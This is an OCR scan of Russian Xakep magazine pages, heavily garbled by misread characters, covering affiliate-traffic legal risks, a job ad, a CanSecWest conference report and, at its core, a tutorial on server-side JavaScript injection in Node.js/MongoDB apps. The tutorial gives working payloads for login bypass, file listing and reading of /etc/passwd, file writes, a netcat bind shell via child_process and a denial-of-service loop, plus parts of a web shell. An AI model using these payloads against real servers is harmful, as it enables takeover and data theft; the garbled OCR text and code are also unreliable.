ЗАКЛЮЧЕНИЕ 

Напоследок хочу напомнить тебе: чтобы успешно зарабатывать на 
трафике, необходимы немалые бюджеты. Только на одно состав- 
ление правильного блэк-листа можно потратить 1000 мертвых 
зеленых президентов. К тому же помни о том, что работать с «чер- 
ными» и «серыми» партнерскими программами лучше не стоит, 
ведь это не только испортит твою карму, но еще и может навлечь 
серьезные проблемы с законом! Успехов! □С 



ЧТО ТЕБЕ ЗА ЭТО ГРОЗИТ 



Перед многими встает вполне логичный 
вопрос: а что грозит БЕО-мастерам 
за все эти дела? Как это ни странно, 
но ответ — практически ничего. Да, 
вот так вот. Ведь ты просто сгоняешь 
трафик из одного места в другое 
(это если речь идет об арбитраже), 
то есть никаких противозаконных 
действий ты, по сути, не совершаешь. 
Но не обольщайся: если тебя захотят 
прикрыть, тебя прикроют. И первое, 
к чему будут прикапываться, — это 
незаконное предпринимательство. 



К тому же, если ты имеешь дело с явно 
«черными» схемами, то разговор 
с тобой будет особый. 

За незаконное предпринимательство 
вообще можно отхватить по полной, 
и ребята из органов часто этим 
пользуются, когда не могут пресечь 
тебя на твоем поле. То есть в этом 
случае тебе говорят, что твоя 
деятельность никак официально 
не зарегистрирована и ты (о ужас!) 
не платишь с нее налоги (а ведь 
90% мастеров этим и грешат). Я не 



буду расписывать юридические 
подробности в деталях, но скажу 
одно: если тебе больше 16 лет и ты 
задумался об арбитраже (чего я, 
в принципе, не советую делать, 
особенно если хочешь связаться 
с «черными» и «серыми» схемами), 
то советую почитать в Гугле про 
этот момент. Ведь если ты не 
позаботишься заранее о своей 
юридической сохранности, то тебе 
вполне может достаться по полной 
от соответствующих органов. 



І'М'.'І 

• Интересный блог 
об арбитраже: 

Мопеѵ4топеѵ.ЬІ2: 

• семинары по 
арбитражу: 

ЬЦ.Іѵ/НаУтСІѵѵ: 

• БсгарВоок: 

ЫЫу/НуУзО . 



ІШП 

Спасибо коіе 
и .Іопп22за 
предоставленные 
материалы и помощь 
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Журнал Хакер ищет кандидатов 
на должность редактора 
рубрики Взлом 



га 
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Основные приметы: 

• На вид 18-28 лет 

• Читает журнал Хаиер и мечтает в нем поработать 

• Знает слова «Х55» и «Неар оѵегііоілг» 

• Умеет и любит лечить БОЬ-инъеиции от слепоты 

’А і 

• 1 курсе, чем пиІІ-ЬуІе отличается от дідаЬуІе . 

• Предпочтет поездку на Віаск На! алкотуру в Ебипте 

• С первого раза отличает хорошую статью от плохой 

• Способен связать больше 5 слов в читаемое предложение 

• Готов к жесткой работе по вербовке новых авторов 

• Умеет читать технические тексты иа английском 





Обращаться на адрес 5Іер@геа1.хакер.ги 
со строкой «Ѵ2І.0М» в теме письма » 
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ПРОДВИНУТАЯ 
ЭКСПЛУАТАЦИЯ 5ЕРѴЕК- 
5ШЕ ЭАѴА5СШРТ ШЕСТІОЫ 

Идея поковырять серверный ОаѵаБсгірІ пришла ко мне 
сразу после прочтения статьи «Тотальный дестрой 
МопдсЮВ» в февральском выпуске журнала. В ней автор 
рассказывал о типичных ошибках при использовании 
І\Іо5С)І_ БД, однако лишь вскользь упомянул интересную 
тему Бегѵег-Бісіе ОаѵаБсгірІ Іпіесііоп. Именно об этом типе 
уязвимостей сегодня и пойдет речь. 




Решив не изобретать велосипед и не писать ничего нового, я взял 
уже готовый код уязвимого приложения из февральского выпуска 
и просто сократил его. В том материале автор только расска- 
зывал, как авторизоваться через данную уязвимость. Это было 
что-то вроде аналога всем известной 5(ЭІ_-инъекции: 

1 '+ог+ 1 = 1 +--+ 



А вот и сам бажный участок кода: 

"350П-іпз‘ес~Еіоп" : -РипсЕіоп () { 

ра§еТі1:1е ІосаІе.топ^оЗзопІпдТіІіІе; 
ргосе55Кедие5І :(-Рипс1:іоп ( Іо^іп. раззыопсі) { 

ѵаг Іо^іпРагагп = еѵа1("({ 1о§іп: ' " + 1о§іп + « 1 . 

раззыогсі: ' " + равзыогсі + " ' } ) » ) ; 
геііигп 1о§іпРагат; 

}); 

Ь 

Как ты уже мог заметить, ошибка заключается в небезопас- 
ном использовании конструкции с еѵаі и отсутствии фильтра 
входящих данных. Как это можно проэксплуатировать? Сейчас 
расскажу. У нас все так же есть МопдойВ с пользователем гооі, и, 
чтобы авторизоваться без пароля через эту уязвимость, достаточ- 
но вставить в поле для ввода имени вот такую конструкцию: 

гооі: ' })// 

В логах запущенного приложения мы сможем понять, что же 
произошло: 



*** (21ІЕКѴ: 

{ 1о§іп: , ^оо-I: , } 

*** ООСІІМЕІЧТ: 

{ ісі: ^37сИ^08Ыа55а79е97940. 

1о§іп: 'гоо-Е'. 
разБыогсІ: ' р@55ы0псІ ' } 

Как видишь, мы авторизовались без пароля. :) 

ПЕРВЬЕ ШАГИ 

Теперь нам нужно извлечь из нашей уязвимости чуть больше, чем 
просто авторизацию без пароля. Сначала попробуем что-нибудь 
простенькое, например, выведем на экран какой-либо текст. Для 
этого в поле для имени пользователя мы должны вставить следую- 
щий код: 

'}); сопБОІе. 1о§( 'Неііо' ) ;// 

Как видишь, здесь валидный запрос закрывается конструк- 
цией «'});». Затем мы подставляем нашу команду, не забывая про 
символы //. Эти символы обозначают, что дальше идет уже не код, 
а комментарий. Кстати, браузер выдал ошибку 500, но давай по- 
смотрим, что же произошло в консоли самого сервера: 

Неііо 

— > ТуреЕггоп: Саппоі: геасі ргорегѣу ' ізСивІіотЗБ ' оТ 
ипсіебпесі 

Здесь видно, что код успешно исполнился! Дальше начинается 
самая сложная часть, над которой мне пришлось попотеть. 
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Серверный Э5 



№ре№ 2МЛ.1;.„Ь4 яеиѵггуесйоч 



Р НОДОиТЛЛі 1 ійівілічнті^^іъйгіі І^ъійг» 

|Еасктгаск игшх ДоСТягеііле бкшіЕѵ (ргхріаіі-св ^Аіпстаск-пд 



№ - № №ЖГШ Г 0»О.Г)! 

А - С«і™.ч*іреС'і«и^_илч1'Ь- 

л ИІН ІЧЙІЧСС 1&0П! *Г»1Л р#55А№|- >1: 



гіЬ.агАмЛпіі-гНі шмі ^Тннг х*. иаылі^ 1 >>і 
Йі.эг4агк.ігаіггі({ піні "Т«ііг 2'. лявилі^ 2 >Ь 

Л? . ога*гя , іпіі гі пн*. "Т#іЕ*г 5'. нпипЕ. 1 )]; 
Й.^П-ІіііИи пім! 7ЯІІГ Г. *ідуп|‘ 4 |)і 

й.агйгі.іиггіЦ мні "Тнгіг ѵ. мйуп-іі 




Просматриваем файл іпзіаіі.із 



Выполняем бэк-коннект через пеісаі 



6ІѴЕ МЕ МОРЕ! 

Для начала немного лирики (надеюсь, опытный читатель меня 
простит). Что нужно хакеру на сервере? Первым делом — до- 
биться исполнения своих команд на захваченной машинке, 
после — читать, листать и изменять файлы. Ну а в идеале — по- 
лучить полноценный/неполноценный шелл. Для этого использу- 
ются всем известные Ьіпсірогі или же ЬасксоппесС 

К сожалению, я не нашел в паблике или в доступном мне при- 
вате веб-шеллов, заточенных под 5егѵег-5ібе ЭаѵаЗсгірІ, поэтому 
решил на сей раз изобрести велосипед и написать свой шелл. 

Но все не так просто, ведь мы не можем видеть, что происходит 
в консоли на сервере, и, соответственно, сопзоі е.І од () не подой- 
дет для наших целей. Однако далее, немного покопавшись в ма- 
нуалах к N осіе^'з, я нашел то, что идеально вписывается в нашу 
задачу, а именно гезропзе.епсЦ) и гезропзе.ѵѵгіІеО. Вот пример 
использования: 

гчигЬ'}); геБропБе.епсК ' <Ы>НаскесГ );// 

Теперь переходим к следующему пункту, под которым я подраз- 
умеваю листинг файлов. Для этого нам надо подключить библиоте- 
ку ^5, это делается с помощью конструкции гециігеС-рБ'). Воттак, 
к примеру, мы можем листать файлы из текущей директории: 



Здесь видно, что в іпзіаі І^з запишется слово ЬаскесІ, однако 
записано оно будет в начало файла, а не в конец. Также нельзя не 
упомянуть о возможности записи в файл с помощью кодировки 
Ьазе64. Эта фича можеттебе пригодиться, если появится необхо- 
димость в записи на сервер уже скомпилированного бинарника, 
исходного кода или просто большого файла. 

Итак, первым делом на локальной машинке узнаем Ьазе64-хеш 
нашего файла при помощи соответствующей команды: 

саі /Ьіп/пс . Іігасіііііопаі | Ьазеб4 

Полученный текст отправим нашему заранее подготовленному 
мини-эксплойту, который все расшифрует и запишет полученные 
данные в файл: 

гооі 1 }) і_гециіге( 'Тб ' ) .мгііеРі1е5упс( 

" пс .Іігасіііііопаі" л "1іи1і_Ьа5е64_косГ ' Ьа5е64' );Ц 

Наконец, перейдем к запуску исполняемых файлов — тому, 
ради чего вся статья, собственно, и задумывалась. К сожалению, 
ты не сможешь увидеть результат, так как он не выводится в ответ, 
однако этот результат можно записать в файл и затем прочитать :). 
Вот пример запуска бинд-порта на Ііпих-системах с пеісаі: 



гециіге( ' -Рз ' ) . геасИіг5упс( ' . ' ) 

Дальше мы должны сделать читабельным вывод. В этом нам 
поможет метод іоБігіпдО: 

' }); ге5роп5е.епсІ(гециіге( ' -Рз ' ) . геасШг5упс( ' . ' ) . 
іо5ігіп §( )) ;/ / 

Получился этакий мини-эксплойт, с помощью которого мы 
можем листать файлы из любой директории. Атеперь перейдем не- 
посредственно к чтению этих файлов: 

гостЬ'}); геБропБе.епсІОедиігеС '-Рб ' 

геасІРі1е$упс( ' іпбіэіі.іб ' ) .іоБігіп^О) ;// 

Затем по логике событий нам нужно научиться записывать что-то 
в файл, делать это мы будем с помощью следующей конструкции: 

гооі ' }); гециіге( ' -Р б ' ) .ыгііеРі1е5упс("іпБіа11 об" . 
"ЬаскесІ") ;// 



гооі ' }) ; гедиіге("сЬі1сІ_ргосе55") . 

ехес( "/Ьіп/пс -1 -р 31337 -е /Ьіп/ЬэбЬ" ); // 

Также нельзя не упомянуть и про возможность использовать 
данную уязвимость для 0о5-атаки. Делается это довольно просто, 
например через запуск бесконечного цикла с ѵѵЫІе: 

гооі'}); ыЬі!е( 1 ) ; / / 

ШЕЛЛ, МИЛЫЙ ШЕЛЛ! 

После нескольких дней изучения полученного материала я и мой 
товарищ дІОѵѵ, с которым мы и работали все это время, написали 
этот веб-шелл. Думаю, что после публикации статьи ты легко 
сможешь найти его в паблике. А пока исходник шелла ищи на 
нашем диске. Здесь же я приведу лишь три его функциональные 
части: 



ііі(тосІе == "/іібі " ) 




Листаем текущую директорию 



ге5роп5е.ыгііе(гедиіге( '-Рб 1 ) . 

геасШг5упс(рагат) .іо5ігіп§()); 



} 

еІБе і-Р СтосІе == "/біе" ) 
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взлом 



біезуз . геасІРі1е(рагаггь_ "Ьіпагу"., 

Типс1:іоп( егг . біе) 

{ 

ге5роп5е.мгі1:еНеасІег(20Ѳ) ; 
ге5роп5е.мгі1:е(б1е., "Ьіпагу"); 
гевропБе.епсІО; 

Ні 

еіве і-РСто сІе == "/ЫпсГ) 

і_ 

ОБ.ехесС"/Ып/пс -1 -р "+рагат+" -е /Ьіп/ЬаБЬ"); 

гезропзе.ыгіІіеС'РопІ: "+рагат+" ЬіпсІесГ); 

гезропБе.епсІО; 

Теперь давай посмотрим на работу нашего скрипта. Для начала 
записываем шелл в файл: 

гооі: ' }); гециіге( ' -Р б ' ) .мгі1:еРі1е5упс("5Ье11. з'б" л "сІшРуІНМБ 

...пропущено много Ьа5еб4-кода. . . 

ы!ік7Р0о=". 'Ьа5еб4'Ѵ. // 

Затем запускаем все это дело через сЫИ_ргосе55: 



гооТ'}); гериігеС'сІііІ^ргосеББ") .ехес("посІе БІіеІІо'Б") ;// 

Для работы с шеллом все готово. Что же он может? Сразу ого- 
ворюсь, что функций пока мало, но это только первая версия, и со 
временем он будет совершенствоваться. Пока что присутствует 
возможность листинга файлов, просмотра каталогов и бинда 
порта. 

Итак, приступим: 

1. Листаем файлы из /еіс 

Ьіір : //Бегѵеп : 8080/1І5і:?/еі:с 

2. Читаем /еіс/раББмсІ 

И1=1=р : //Бегѵеп: 8080/б1е?/е1:с/ра55ысІ 

3. Биндим порт 

Ыііір: //5егѵег:8080/ЬіпсІ?31337 



НАПУТСТВИЕ 

Как видишь, Ыосіе.]5 имеет ряд полезнейших для хакера функ- 
ций, которые помогут ему с удобством обосноваться на взломан- 
ном сервере. Твоя задача — намотать всю полученную информа- 
цию на ус, испробовать написанный шелл в деле и проверить все 
свои 1\1о5С11_-проекты на уязвимости. На этом все. Успехов! □С 






■йквджіівд ПіурсфЫ) м е- 




14*1 | ш? В1ВД4 



Бэк-коннект через шелл 



З&аскИвск Іігтих НОТСетіІѵе-емипіу ЩЕярІя^Св \Аігаъ- 



ГуйТ ; К - &: О : ГйОТ ; /ТЪМ і /ЬІИ 

гіав ип : і : 1 : 1 1 йаеюп : Алг/іЬіп : /ЪіпУікі 

Ьігн « і ! Ьі,р і Ліп і Лі п/зН 

ъуь : к : 3: Э : : /гій ч : /Ь іп/еіі 

чуАС 1*1 А \ ; -іупс ; Алп ; ДІпАтяС 

дш*; * ^ ; ВД: ; Л ; /ЪІП/ЧІІ 

МП I к з &■ 1 2 : ван і /ѵіг/с« гіа/вііп і /ы п/чіі 

\р г я : 7: 7 : 1р : /гйГ/ірййХ/Іргі: /Ып/іА 

■аі I ; К : в ; ВВ 1 1 і /ѵвг/вві 1 ; /Ьыі/іН 

ПМ : д : &! 9 : Ші ЛІл/іЬ 

V уср : х : 1 о ! ^ Л* гѴцчш І/ииСр : /Ь%п / Ці 

ргояу :Хі 1Э;ІЗ:рГйху ; /ЪІЛ : /ѢІП/-ІП 

ѴѴѴ-йлІВ ; X : 33 ; 33; ѴШ- Да! В ; /ѴВГЛЛѴ; /М П/вЬ 

Ьаскчір : 1 ; 34: ЗІ ! я А АГ /ІЖ^Чр* ! 

\гъХ :л:3€: ЗЗіНаіЛіпд ііѣХ Напв^п/ѵігДІі(:/Ьіп/йІі 
1ГС і Я і Э9і Й; Лаг/ПІП Л Г«1 і /ЬіяЛіІП 

Л1 :Л Вид-ЛрвГГІйд Бу* 1*1 

Ь Ці«ій і К і ІЮ: 101 : : ДагД 16 Л ІЫШІ 4 : /Ы п/*П 
і : ІОІ : 103: : : /Ып Ааівд 

55ІНІ ; і : )02 ; €5534: с /ѵл г/пп^іУі /ивг/кЬіп/РйІи^іп 

Ііпйіар# : * : Ш : ІЮ : ? А»г Д іЬ/ипйкар* : ЛщѴІцѴ#* 

: і - 104- 112:: /ѵ#г/ЩП/<ЙКП : Дцп Д*ІИ 
ПвЫмІу : % : №53* : €6534 : Г\йШу : /ЛЙПМ.І4ЧПІ ; ЛІА/ЗІ1 
■уВЕ]1 ; I : ІЙ: 11 Эі і /Ч агДіЪ/іу*ЦІ ; Л 1(1 Даі 5* 

ѵ^лЧ.: ..ЛЛД.ПІ.. ■■■■ ■■■ аг. ■■ -х А п..: ■■ Л . і .-4 1 , д. 



Просматриваем /еіс/раввѵѵсі через наш шелл 



НЕКОТОРЫЕ 

ПОЛЬЗОВАТЕЛИ И00Е.35 



1. ВКонтакте ( ѵк.сот ) — на базе ІЧосіе.ІБ 
разработан ХМРР-сервер. 

2. РІигк ( ріигк.сот ) — N о сі е . і 5 использован 
для реализации функций общения 
пользователей. 

3. Тгапзіоасі.іи ] — сервис 

перекодирования видео. 

4. Негоки ( ѵѵѵѵѵѵ.Ьегоки.сот ) — облачный 
хостинг. 

5. Цоѵепі ( ѵѵѵѵѵѵцоѵепі.сот і — облачный хостинг. 

6. Яндекс. Почта ( таіі.ѵапсіех.ги ) — известный 
почтовик. 

7. УоиТиЬе [ ѵѵѵѵѵѵ.ѵоиІиЬе.сот І — некоторые части 
видеохостинга также сделаны на ІЧосІе^Б. 



• Презентация про 
5535 с ВІаскНаІ: 

ЬіЫу/І4дОКЬ: 

• оригинальная 
статья от ВІаскНаІ: 

ЬШуАтгеар 

• официальный сайт 
Ыосіе.із: 

посіеіг.огд . 



іші 

• Многие 
разработчики 
полностью уверены 
в безопасности 
своего сайта, 
написанного на 
55.Л5, и могут даже 
не фильтровать 
входящие данные. 

• Мосіе.іг — 
событийно- 
ориентированный 
1/0 фреймворк на 
.^ѵаБсгірІ-движке 
Ѵ8. 



ПРЕИМУЩЕСТВА 
СЕРВЕРНОГО ЗАѴА5СРІРТ 



1. Прост при изучении, если программист 
знаком с синтаксисом обычного ^ѵабсгірі. 

2. Объем кода уменьшается, упрощая тем 
самым его чтение. 

3. Быстр и гибок, можно настроить под любые 
нужды. 

4. Динамический язык программирования. 

5. Быстрая обработка ^ОМ прямо на сервере. 

6. Быстро работает в связке с ІЧоБОІ- СУБД. 



ош 

На нашем дискеты 
найдешь исходник 
представленного 
в статье шелла, 
а также наглядный 
видеоролик по 
продвинутому 
использованию 
5535-іп]есІіоп. 
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Получать скидки \ ІЩ. Е ^рУІЛ *** ЛВ 
в барах, ресторанах и 

магазинах твоего \ ^і^д РйР^І 

города уД **| ДрЕЖ \/|51 

Участвовать в акциях ЕЗріВіЯИ 

и посещать закрытые 

мероприятия для держателей «Мужской Карты» 

■ •* 
Управлять своими счетами, используя систему 



интернет-банка «Альфа-Клик» 

Оформить подписку на журнал 
«Хакер» со скидкой 50% 

тел. подписки (495) -663-82-77 | $Нор.дк.пі 



Оформить дебетовую или кредитную «Мужскую карту» можно в отделениях 
ОАО «Альфа-Банка», а также заказав по телефонам: 

(495) 229-2222 в Москве 1 8-800-333-2-333 в регионах России (монщ бесплатный) 



^кМб^атунлА е чмСнСм А Альфа* Банк (дате)Іапб 



ѵѵиллшіапсагсіги 



Ьіик.-, Генерал йиіл диценаий Банка России на 



«ПИЙ операций от Н.ОЫЭЭВ №1; 



— * ■ 


■||Я||| 


кТп ^ 










Ж 






взлом 



АгІЬиг бегкіз (іѵѵіиег.сот/ахЗЗОсІ) 




Каждый год в начале марта крутые хакеры разных 
мастей собираются на конференции СапЗесѴѴезІ, 
чтобы представить всему продвинутому ІТ-миру 
свои исследования и наработки в области ИБ. 
Автору удалось побывать на этом замечательном 
мероприятии, о чем, собственно, и пойдет речь. 




ПРИЕХАЛИ 

Место проведения конференции — прекрасный 
канадский город Ванкувер. Есть, правда, меро- 
приятия и поближе: ЕІІБесѴѴезІ, РасБес и ВА-Соп 
— проводят их в Европе, Японии и Буэнос- 
Айресе соответственно, однако они не настолько 
популярны, как СапБесѴѴезТ Конференция 
проходит в шикарном отеле БЬегаІоп ѴѴаІІ Сепіге, 
где можно и самому поселиться, если вовремя 
забронировать номер. Там же до конференции 
проводятся и мастер-классы по эксплуата- 
ции, поиску уязвимостей, пентесту и сетевой 
безопасности. Для тренингов нужно регистриро- 
ваться и платить отдельно. Удовольствие не из 
дешевых, как и билеты на саму конфу, которые 
стоят от 1900 канадских долларов. 

ЗА КУЛИСАМИ 

В первое утро проводилась регистрация 
участников, естественно, с выдачей бейджи- 
ков, разных стикеров и другого стаффа. Позже 
можно было получить свитер или куртку. Ко- 
нечно, присутствовали стенды разных крупных 
вендоров типа Соодіе, МісгозоІТ, Казрегзку, 
ВІаскВеггу, которые тоже щедро раздавали 
всякие игрушки и рекламные бюллетени. Куда 
же без них. Еще был стенд от ІМоБіагсЬРгезз, 



где можно было купить разные интересные 
книги и получить подпись от Эндрю Хонига, яв- 
ляющегося соавтором книги Ргасіісаі Маіѵѵаге 
Апаіузіз. В перерывах можно было бесплатно 
перекусить, с утра кормили завтраком, а днем 
— сытным обедом. 

ДЕНЬ ПЕРВЫЙ, СРЕДА 

Главный затейник данной конференции 
Драгое Рю — крайне веселый и к тому же 
обожающий всяческие гаджеты человек. 

В первый день выступления он поставил на 
стол так называемого Сгееру 5и гѵеі I Іа п се 
Виппу — забавного электронного зайца, 
оповещавшего присутствующих о том, 
что же происходит в данный момент на 
входящем в конфу соревновании Рѵѵп20ѵѵп. 
Но так как он мешал, зайца решили 
ликвидировать :). Также можно было на- 
блюдать проекцию твиттера с хеш-тегами 
СапБесѴѴезІ — все, что писали люди на 
соответствующую тематику, сразу отобра- 
жалось на стене. Сами слайды проециро- 
вались сразу на четыре участка той самой 
стены, чтобы происходящее было видно 
абсолютно всем. В общем, все было крайне 
технологично и на уровне. 



А вот и доклады первого дня: 

1. йеерВооІ 

Докладчики: Николас Эконому и Андрес Лопез 
Люксенберг,Соге5есигіІу 

Это была первая презентация, со страшнова- 
тым английским, но интересным содержанием. 
Исследователи представили технику, которая 
позволяет контролировать операционную 
систему прямиком с момента ее загрузки. 
Получить контроль над процессором можно 
еще с началом выполнения первых инструк- 
ций. Техника довольно-таки универсальная: 
работает для 32- и 64-битных систем с прак- 
тически любой операционной системой. Были 
представлены демки с загрузкой ѴѴіпсІоѵѵз ХР 
5РЗ, АгсЬ І_іпих, ОрепВБй — в систему был 
установлен руткит, который работал и при на- 
личии антивируса. 

2. БосіаІ Аиіііепіісаііоп 
Докладчик: Алекс Райс, РасеЬоок 

Веселая презентация от члена команды 
безопасности Фейсбука. Тема — проблемы, 
с которыми столкнулись разработчики, когда 
трудились над улучшением безопасности 
аутентификации и восстановления доступа, 
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а также почему именно они столкнулись с та- 
кими проблемами и как их решали. Главным 
образом разработчики пытались определить 
соответствие аккаунта и человека по его 
знанию фотографий, которые он загрузил 
в свой профиль. Выбрали данный метод как 
наиболее эффективный, хоть и весьма пробле- 
матичный — много шума и лишних объектов 
на фотографиях, сложности с определением 
людей негроидной расы. Определение людей 
на фотографиях должно быть автоматизирова- 
но со стороны Фейсбука. 

3. АсІѵапсесІ Регзізіепі Везропзе 
Докладчик: Пелеюс Алей, АсІоЬеЗузІетб, Іпс. 

В последние годы РІазЬ стал весьма при- 
влекательной мишенью для хакерских атак и, 



соответственно, корпорация АбоЬе стала заду- 
мываться о защите своих акций, тьфу, пользо- 
вателей :). Презентация показывает противо- 
стояние и тенденции атак злоумышленников, 
а также то, как новые способы защиты влияют 
на выбор вектора атаки, какие мишени были 
в прошлом и что ждет нас в будущем. 

4.Іп5ІсІеІІіе0ияиСоттапсІ&СопІгоІ$егѵег5 
Докладчик: Роэл Шоувенберг, Казрегзку І_аЬз 

Какты помнишь, недавно нас испугали страш- 
ной малварью под кодовым именем Оіщи, или, 
как его еще именуют, родственник БіихпеР 
Зловред был обнаружен в августе 2011 года 
исследовательской лабораторией компании 
СгуБуБ. Мистика Рощи — это, на момент презен- 
тации, неизвестный язык программирования 



(использован нэйтив АРІ), где объекты общают- 
ся между собой при помощи вызовов методов 
и событийно-ориентированных колбеков. Как 
нам сообщили, лаборатория обращалась за 
помощью не только к экспертам из МісгозоЙ, но 
и к другим известным личностям и фирмам. Не 
забыли попросить помощи и у зала. 

ДОКЛАДЫ ВТОРОГО ДНЯ 

Второй день был не менее интересным. 

І.РгоЬіпд МоЬіІеОрегаІогМеІѵѵогкз 
Докладчик: Колин Мюллинер 

После таких презентаций становится страшно 
жить! Оказывается, масса разных мобильных 
устройств, присутствующих в блоках управ- 
ления питанием электросетей и силовыми 
устройствами, отоплением, разные датчики 
0Р5, контроллеры камер и разных систем 
наблюдения имеюттакие данные аутенти- 
фикации, которые вполне можно подобрать 
вручную! Для некоторых устройств простая 
аутентификация отсутствует и вовсе — нас 
сразу приветствует рутовый шелл! Докладчик 
просканил мобильные сети Германии и обнару- 
жил такую вот беспечность. 

2.І_едаІ Іззиезіп МоЬіІе Бесигііу Кезеагсіі 
Докладчик: МарсиаХофманн, ЕРР 

Марсиа рассказала о том, что можно делать, 
а что нельзя для избежания неприятностей 
с законом при реверс-инжиниринге и джейл- 
брейке мобильных устройств. Сами пункты 
законов весьма мутные, и порой непонятно, 
как вообще трактовать ту или иную формули- 
ровку. Каким образом адвокат или прокурор 
сумеют доказать свою точку зрения, так дело 
и решится. Если неуверен и нетжелания ри- 
сковать свободой, то можно обратиться в ЕРР 
за консультацией. Весьма полезный доклад, 
несмотря на то что кому-то данные вещи ка- 
жутся скучными и даже бесполезными. Всегда 
стоит иметь в виду, что работа, которую ты 
хочешь опубликовать или представить, может 





Хакеры Рѵѵп20ѵѵп пишут эксплойты в специальной комнате 
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Аарон Портной награждает победителей Рѵѵп20ѵѵп 



Таблица сучастниками Рѵѵпіит 



хорошенько испортить настроение какому- 
либо вендору. 

3. 105 5— Ап Ехріоііаііоп Мдііііпаге? 
Докладчик: Стефан Эссер 

Лично мне этот доклад понравился больше 
всех. Видимо, стиль выступления и презен- 
таций, а также насыщенность техническими 
деталями сделали свое дело. Стефан рассказал 
о сложностях эксплуатации Ю5, с которыми он 
столкнулся в пятой версии. Свежее обновление 
принесло много изменений в операционную си- 
стему, и многие известные трюки и техники, что 
были использованы в джейлбрейках прежде, 
перестали работать. Вообще, это самый на- 
стоящий хардкор. Для последнего джейлбрей- 
ка Стефан использовал три уязвимости в ядре 
и еще три — в юзермоде. Кстати, последнее 
обновление для Ю5 вышло как раз за день до 
его выступления, и он поспешил подкоррек- 
тировать презентацию. Слайды доступны для 
скачивания на его сайте апіісІОіе.сот . 

4. Іпігоіо Меаг РіеИ Соттипісаііоп (ЫРС) 

МоЬіІе Бесигііу 
Докладчики: Кори Беннингер 
и МаксСобэйл, Іпіегрісіиз 

І\ІЕС используется для передачи данных при по- 
мощи беспроводной связи на малые расстояния. 
Эту технологию применяют для осуществления 
мобильных платежей, работы с электронными 




Стефан демонстрирует изменения зон каІІосИ 



досками, покупки билетов и тому подобного. 

Мы даже порой и не догадываемся, где она ис- 
пользуется. Ребята из Іпіегрісіиз ознакомили нас 
с принципами работы и состоянием безопасно- 
сти І\ІЕС на сегодняшний день, а также проде- 
монстрировали атаку на Соодіе ѴѴаІІеС 

Конец рабочего дня отмечали в ночном клубе 
Тгопараіоога. Это было закрытое мероприятие, 
помещение выкупили для участников конфе- 
ренции — проход строго по паспорту и бейджу. 
Пока все еще были в трезвом уме, где-то полчаса 
люди могли выступать с короткими (до пяти ми- 
нут) шуточными презентациями. РІапитки в баре 
были бесплатными, что послужило катализато- 
ром опьянения большей части народа. 

ДЕНЫРЕТИЙ, ПЯТНИЦА 

І.ѴиІпегаЬіІіІуАпаІузізапсІ Ргасіісаі Баіа РІоѵѵ 

АпаІузіз&ѴізиаІігаІіоп 

Докладчик: Чон ВукОу, МісгозоН 

Тоже интересный, на мой взгляд, доклад, где 
автор проекта Оагипбгіт поведал миру о том, 
как можно упростить анализ уязвимостей при 
помощи визуализации и анализа потока дан- 
ных. В качестве примера был продемонстри- 
рован анализ уязвимости в АбоЬе Реабег (СѴЕ- 
2011-2462). Про саму презентацию в деталях 
можно почитать в блоге ММРС ( Ьіі.1у/6ХУІ_РІ2 ). 

2.5сги(іпІ2Іпд а Соипігу изіпд 
Раззіѵе йМБ апсі Рісѵіг 
Докладчики: Себастьян Трикод 
и Александр Дуляной 

Один — эксперт по сетевой безопасности от 
сігсі.іи, второй — по визуализации из Рісѵіг 
І_аЬз. Они решили объединить свои силы и зна- 
ния для создания общего проекта, посвященно- 
го визуализации сетевой активности. Расска- 
зали нам о том, как создавался этот проект, что 
из этого вышло и какую практическую пользу 
можно извлечь. Если вкратце, то аномальные 
графы дают знать о том, что происходит что-то 
нехорошее, например ОйоВ. Сам доклад ты 
сможешь найти по ссылке: Ьіі.Іу/ОМХоЭВ . 

РѴѴМ20ѴѴЫ 

Это вообще гвоздь программы. Рѵѵп20ѵѵп 
всегда был достаточно громким состязанием, 



но последний конкурс претерпел некоторые 
изменения, что вызвало бурю эмоций у ресер- 
черов и волну постов у журналистов. По новым 
правилам больше не будет розыгрыша очереди 
участия — решили сделать все по-честному. 
Теперь, помимо демонстрации эксплойта, 
нужно еще разработать прямо на месте какой- 
либо софт для эксплуатации одной из старых 
уязвимостей в браузере. Как потом выясни- 
лось, участники имеют право не сообщатьуяз- 
вимость, необходимую для обхода сендбокса, 
что крайне огорчило Соодіе :). Поэтому они 
решили отказаться от спонсорства и быстро 
создали свой конкурс — Рѵѵпіит, где можно 
лишь показать эксплойт, но обход сендбокса 
надо отдать вендору. Общая сумма, которую 
можно забрать, составляла ни много ни мало 
миллион долларов. Однако далеко не все 
поняли правила игры. На самом деле проис- 
ходило так — сливай эксплойты с обходом 
сендобкоса за 60 килобаксов (максимум), пока 
не наберешь миллион. Вообще, никто не ожи- 
дал, что на Рѵѵпіит кто-нибудь замахнется. Но 
тем не менее два участника — Сергей Глазунов 
(удаленно через прокси) и участник под псев- 
донимом РіпкіеРіе — таки забрали свой куш 
размером в 60 тысяч. 

ПОДВОДЯ итоги 

Конференция завершилась награждени- 
ем финалистов Рѵѵп20ѵѵп: Ѵиреп, ѴѴіІІет 
и Ѵіпсепго. Призеры получили свои пиджаки, 
сшитые специально для конкурса, ноутбуки 
и деньги. После был аукцион книг издатель- 
ства ІМоВіагсЬРгезз, того самого, что печатает 
всякие хакерские материалы. Все собранные 
деньги пошли на пожертвования ЕРЕ. 

В заключение хочу сказать, что конферен- 
ция стоит потраченных денег. Вообще, одна из 
ценностей таких конференций — это не только 
презентации, но и бизнес-контакты, пиво 
с друзьями и прочая веселуха, чего тут было 
хоть отбавляй. Могу лишь посочувствовать 
тем, кто едет на мероприятия такого рода лишь 
с целью навариться на знаниях, полученных 
из докладов. Это в корне неверный подход. Так 
что копи бабло и отрывайся по полной! Осталь- 
ную информацию ты сможешь найти на сайте 
сапзесѵѵезЕсот . ПС 
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Система: 

*піх/ѵѵіп 




СОБИРАЕМ ИНФОРМАЦИЮ ВМЕСТЕ 
С 5Р6ІМ-ІМР06АТНЕР 

На первоначальном этапе любого пентеста 
очень важно собрать побольше любой 
доступной информации о нужном тебе сервере. 
Конечно, тебе помогут всяческие ѵѵЬоіз, 
птар и иже с ними, но есть способ лучше! 
Представляю твоему вниманию замечательную 
прогу згдп-ІпІюбаіЬег. Ее функционал разделен 
на пять основных блоков: 

1. Поиск информации о домене: ІМБ-записи и 
МХ-записи, поддомены (поиске помощью 
Гугла и брутфорса), кластеры и дополни- 
тельные серверы на разных ІР, похожие 
домены, ѵѵЬоіз. 

2. Поиск информации о ОМБ^опе-ІгапзІюгз, 
версия сервиса. 

3. Поиск информации о почтовых сервисах: 

